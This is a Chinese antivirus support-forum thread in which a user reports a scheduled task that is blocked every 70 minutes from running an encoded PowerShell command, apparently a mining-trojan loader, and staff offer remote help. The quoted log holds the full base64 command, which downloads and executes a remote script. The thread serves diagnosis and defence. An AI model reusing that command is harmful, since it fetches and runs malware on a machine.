火绒安全软件

动态防御问题反馈
发新帖
打印 上一主题 下一主题

每隔70分钟就弹出利用PowerShell执行可疑脚本…

[复制链接]
4160 7
楼主
发表于 2020-3-31 19:30:23 | 显示全部楼层 |倒序浏览 |阅读模式
跳转到指定楼层
  1. 【1】2020-03-31 18:50:06,系统防护,系统加固,svchost.exe触犯敏感动作防护规则, 结束进程

  2. 操作进程:C:\Windows\system32\svchost.exe
  3. 命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  4. 父进程:C:\Windows\system32\services.exe
  5. 防护项目:利用PowerShell执行可疑脚本
  6. 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  7. 执行命令行:powershell.exe -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGEAZABkAHIAZQBzAHMAbgBlAHQALgBkAG8ALgBhAG0ALwBlAGMALgB0AHgAdAAnACkAKQA=
  8. 操作结果:结束进程
复制代码
就是这个,从开机开始,每隔70分钟就执行一次,虽然被拦下来了但是全盘扫描查不出来…进入安全模式全盘扫描了一遍也查不出来,而且百度了一下那个命令行结果全是挖矿木马人都傻了…
虽然现在没啥影响,但是每70分钟就跳出来一次心里总归不舒服,百度了一大堆看都看不懂,自己就不是那块料…
有别的解决办法吗…真不想重装系统啊…

回复

使用道具 举报

4160 7
沙发
发表于 2020-3-31 21:57:20 | 显示全部楼层
Nobuchika 发表于 2020-3-31 21:17
保留現場,明天上班時間會有官方跟進查看的

因为网课的关系要用到电脑…应该没问题吧…
回复

使用道具 举报

4160 7
板凳
发表于 2020-4-1 10:40:18 | 显示全部楼层
火绒运营专员 发表于 2020-4-1 10:12
您好,麻烦您添加QQ:2208613431,我们远程看下问题,感谢您的反馈!

刚加上
回复

使用道具 举报

您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

快速回复 返回顶部 返回列表